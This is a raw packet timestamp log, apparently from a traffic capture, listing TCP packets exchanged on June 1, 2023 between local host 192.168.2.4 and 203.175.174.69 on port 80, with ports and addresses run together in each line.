                                                      Jun 1, 2023 12:14:30.220479965 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220484018 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.220500946 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220523119 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220526934 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.220544100 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220563889 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220568895 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.220586061 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220607996 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220612049 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.220628977 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220649958 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220655918 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.220669985 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.220695972 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.273478031 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388366938 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388408899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388437033 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388461113 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388473988 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388488054 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388513088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388519049 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388540030 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388559103 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388566017 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388592958 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388607979 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388617039 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388643026 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388668060 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388691902 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388715029 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388715982 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388739109 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388741970 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388765097 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388767958 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388793945 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388816118 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388818026 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388844013 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388858080 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388870001 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388894081 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388914108 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388920069 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388946056 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388966084 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.388968945 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.388995886 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389020920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389044046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389069080 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389091969 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389115095 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389115095 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389139891 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389161110 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389162064 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389187098 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389209986 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389210939 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389235020 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389255047 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389260054 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389285088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389303923 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389309883 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389334917 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389353037 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389357090 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389381886 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389401913 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389405966 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389430046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389450073 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389455080 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389478922 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389499903 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389502048 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389524937 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389543056 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.389549017 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.389596939 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.441375971 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.441433907 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.441504002 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557511091 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557571888 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557606936 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557621956 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557641983 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557673931 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557682037 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557708025 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557739973 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557748079 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557771921 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557802916 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557811022 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557833910 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557864904 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557873964 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557895899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557929039 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557935953 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.557961941 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.557991982 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558005095 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558022022 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558052063 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558062077 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558084965 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558115959 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558125973 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558147907 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558177948 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558191061 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558211088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558248997 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558249950 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558280945 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558315039 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558320045 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558343887 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558374882 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558384895 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558408022 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558438063 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558465004 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558469057 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558501005 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558507919 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558532000 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558562040 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558569908 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558593035 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558624983 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558634043 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558657885 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558687925 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558695078 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558718920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558751106 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558756113 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558780909 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558811903 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558821917 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558844090 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558873892 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558881998 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558903933 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558934927 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558943987 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.558967113 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.558999062 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.559006929 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.559031010 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.559077978 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.609349966 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.609394073 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.609505892 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.726768017 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.726835012 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.726882935 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.726902008 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.726931095 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.726984978 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.726989985 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727035046 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727083921 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727097034 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727133036 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727184057 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727196932 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727245092 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727292061 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727293968 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727343082 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727391005 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727394104 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727443933 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727490902 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727492094 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727540016 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727590084 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727590084 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727638006 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727685928 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727689028 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727732897 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727781057 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727790117 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727842093 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727888107 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727896929 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.727936983 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727983952 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.727993965 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728030920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728077888 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728077888 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728125095 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728172064 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728176117 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728219032 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728275061 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728286028 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728337049 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728370905 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728410006 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728427887 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728457928 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728507042 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728552103 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728555918 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728606939 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728631973 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728655100 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728703022 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728703022 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728749990 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728797913 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728797913 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728847980 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728894949 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728904009 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.728943110 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728991985 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.728993893 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.729038954 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.729087114 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.729089975 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.729135990 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.729185104 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777323961 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777368069 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777396917 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777426004 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777442932 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777468920 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777494907 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777518988 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777523041 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777551889 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777574062 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777574062 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777580023 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777609110 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777636051 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777637959 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777664900 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777683020 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777693987 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777724028 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777740002 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777751923 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777781963 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777800083 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777808905 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777839899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777853966 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777868032 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777896881 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777916908 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777924061 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777952909 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.777967930 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.777986050 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778023958 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778033018 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778054953 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778080940 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778106928 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778107882 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778137922 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778155088 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778165102 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778193951 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778220892 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778225899 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778247118 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778266907 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778274059 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778301954 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778328896 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778330088 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778359890 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778386116 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778407097 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778412104 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778430939 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778439999 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778466940 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778489113 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778497934 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778526068 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778543949 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778553963 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778580904 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778599024 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778609037 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778644085 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778654099 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778672934 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778698921 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778717995 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778727055 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778753996 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778770924 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778781891 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778810978 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778826952 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.778836966 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.778881073 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.896939993 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.896990061 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897022963 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897053957 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897077084 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897083044 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897116899 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897123098 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897151947 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897188902 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897190094 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897223949 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897233963 CEST4969580192.168.2.4203.175.174.69
                                                      Jun 1, 2023 12:14:30.897255898 CEST8049695203.175.174.69192.168.2.4
                                                      Jun 1, 2023 12:14:30.897281885 CEST8049695203.175.174.69192.168.2.4
